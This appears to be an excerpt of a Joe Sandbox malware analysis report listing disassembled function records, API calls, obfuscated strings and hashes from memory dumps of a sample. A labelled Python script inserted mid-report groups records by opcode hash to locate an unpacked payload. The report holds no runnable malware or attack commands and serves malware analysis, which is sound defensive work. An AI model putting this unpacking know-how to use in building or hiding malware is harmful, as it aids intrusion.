                                                                                                                                                                                                                                            • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

Control-flow Graph

control_flow_graph 332 438e47-438e4a 333 438e51-438e55 RtlAllocateHeap 332->333
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
• Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
• Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
• Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
• Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
• Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
• Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008F8E6E
Memory Dump Source
• Source File: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008F8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_8f8000_91B1.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 5ecbfff04eb4a50b10df7296c1ac593d663f9e0bd6ab1ad89245364951c45574
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 4A113F79A00208EFDB01DF98C985E99BBF5EF08750F058094FA489B362D771EA50DF80
APIs
• CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
• SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
• CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
• SysAllocString.OLEAUT32(w!s#), ref: 004364FB
• SysAllocString.OLEAUT32(A3q5), ref: 004365A1
• VariantInit.OLEAUT32(?), ref: 00436613
• VariantClear.OLEAUT32(?), ref: 00436775
• SysFreeString.OLEAUT32(?), ref: 004367A0
• SysFreeString.OLEAUT32(?), ref: 004367A6
• SysFreeString.OLEAUT32(00000000), ref: 004367B3
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
• String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
• API String ID: 2485776651-4124187736
• Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
• Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
• Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
• Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4%$>V$>V$<>$EG$IK$UW$|~
• API String ID: 0-2246970021
• Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
• Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                            • API String ID: 0-2246970021
                                                                                                                                                                                                                                            • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                            • Instruction ID: 57884115f73a545973cdd85e813ae28e768ac0b03b9150b708654ebc8ab184ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E13242B0601B469FDB48CF26D580389BBB1FF45304F548698C9695FB5ADB35A8A2CFC0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                            • API String ID: 0-119712241
                                                                                                                                                                                                                                            • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                            • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                            • API String ID: 0-2430453506
                                                                                                                                                                                                                                            • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                            • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-3264166258
                                                                                                                                                                                                                                            • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                            • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-3264166258
                                                                                                                                                                                                                                            • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                            • Instruction ID: 71bcb16d34c2afef8497121d6b07e83acbbc8df18cf3bd58003839770b83cb46
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0B1D57510C3818EE369CF29C4D07ABBBD2AFD6314F188A6ED4D98B391DB748549C722
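The two records above share Opcode ID 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77: once in the mapped image at offset 00400000 (based on PE: true) and once in the region at 02490000 (based on PE: false), with different Instruction IDs. That pattern is consistent with the same function being present at two base addresses, which is what the "Detected unpacking" signatures in this report point to. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in the plain-text layout of this listing and reports every Opcode ID that appears in more than one memory dump. The embedded input is constructed from (and abridged to the relevant fields of) the records on this page; the assumption that each record opens with a "Strings" or "APIs" heading, and the field regexes, are mine.

```python
"""Group Joe Sandbox function records by Opcode ID across memory dumps.

Added example, not part of the report. A record's Memory Dump Source says
which dump the function was disassembled from; its Similarity block carries
an Opcode ID. One Opcode ID found in two different dumps is the same code
living at two addresses (e.g. original image plus an unpacked copy).
"""
import re
from collections import defaultdict

# Constructed input: three records abridged from this page's listing, with
# the hashes and source file names copied from it (assumed layout).
SAMPLE_LISTING = """\
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Similarity
• Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Similarity
• Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction ID: 71bcb16d34c2afef8497121d6b07e83acbbc8df18cf3bd58003839770b83cb46
APIs
• GetCurrentProcessId.KERNEL32 ref: 02498A1B
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Similarity
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: 3c22db29e3041e4883b340d1e0098570924b4724292bdb834f920f83e432cf9b
"""

RECORD_HEADINGS = {"Strings", "APIs"}  # assumed: every record opens with one of these
SOURCE_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
OPCODE_RE = re.compile(r"^Opcode ID: ([0-9a-f]{64})$")
INSTRUCTION_RE = re.compile(r"^Instruction ID: ([0-9a-f]{64})$")


def parse_records(text):
    """Split the listing into one dict per function record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()  # drop indentation and bullet
        if line in RECORD_HEADINGS:
            if current is not None:
                records.append(current)
            current = {"dump": None, "offset": None, "based_on_pe": None,
                       "opcode_id": None, "instruction_id": None}
            continue
        if current is None:
            continue  # lines before the first record heading
        if m := SOURCE_RE.search(line):
            current["dump"] = m.group(1)
            current["offset"] = int(m.group(2), 16)
            current["based_on_pe"] = m.group(3) == "true"
        elif m := OPCODE_RE.match(line):
            current["opcode_id"] = m.group(1)
        elif m := INSTRUCTION_RE.match(line):
            current["instruction_id"] = m.group(1)
    if current is not None:
        records.append(current)
    return records


def cross_dump_matches(records):
    """Opcode IDs seen at more than one dump offset, each mapped to sorted
    (offset, based_on_pe, instruction_id) tuples."""
    by_opcode = defaultdict(list)
    for rec in records:
        if rec["opcode_id"] and rec["offset"] is not None:
            by_opcode[rec["opcode_id"]].append(
                (rec["offset"], rec["based_on_pe"], rec["instruction_id"]))
    return {op: sorted(hits) for op, hits in by_opcode.items()
            if len({offset for offset, _, _ in hits}) > 1}


def describe(matches):
    """One human-readable line per duplicated Opcode ID."""
    out = []
    for op, hits in matches.items():
        where = ", ".join(f"{offset:08X} ({'PE image' if pe else 'not a mapped PE'})"
                          for offset, pe, _ in hits)
        out.append(f"Opcode ID {op[:16]}... present in {len(hits)} dumps: {where}")
    return out


if __name__ == "__main__":
    for line in describe(cross_dump_matches(parse_records(SAMPLE_LISTING))):
        print(line)
```

Run against a full report export, the same grouping also surfaces functions that exist only in the non-PE region: those are the ones to prioritise when carving the unpacked payload, since nothing in the on-disk image corresponds to them.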
APIs
• GetCurrentProcessId.KERNEL32 ref: 02498A1B
• GetCurrentThreadId.KERNEL32 ref: 02498A25
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02498AC2
• GetForegroundWindow.USER32 ref: 02498AD7
• ExitProcess.KERNEL32 ref: 02498BD9
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 4063528623-0
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: 3c22db29e3041e4883b340d1e0098570924b4724292bdb834f920f83e432cf9b
• Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction Fuzzy Hash: F6417C77F4431807D71CAEB9DC9936AB69B9BC4314F0E803F6985AB390DE795C0696C0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: )*$X9{;$r1B
• API String ID: 0-1001561910
• Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
• Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
• Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
• Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: -$C\$Iz$[^$de
• API String ID: 0-3020956940
• Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
• Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
• Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                            • API String ID: 0-3335612808
                                                                                                                                                                                                                                            • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                            • Instruction ID: 069069d79d43cb6cf4bea0452027827898fb68567307262ae85d267941b464e6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AD117B56083018BD724DF25C8527ABB7F2EF92319F18996DE4828F3A4F7799401CB52
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                            • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                            • Instruction ID: f301dbb6ca1db81a006255d0263494cc57243c56ef61b29d79540b35bb951c58
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66A1D77510C3818EE365CF29C4D07ABBBD2AFD6304F188A6ED4D98B391DB748449C766
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                            • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                            • Instruction ID: 362284b3f6d56a0dbaff5ada9fcfbcea297e515e5218d39ffbb8955a1c9c2a62
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FA1D77410C3818EE365CF29C4D07ABBBD2AFD6304F288A6ED4D98B391DB748549C766
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                            • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                            • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                            • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                            • API String ID: 0-483502859
                                                                                                                                                                                                                                            • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                            • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
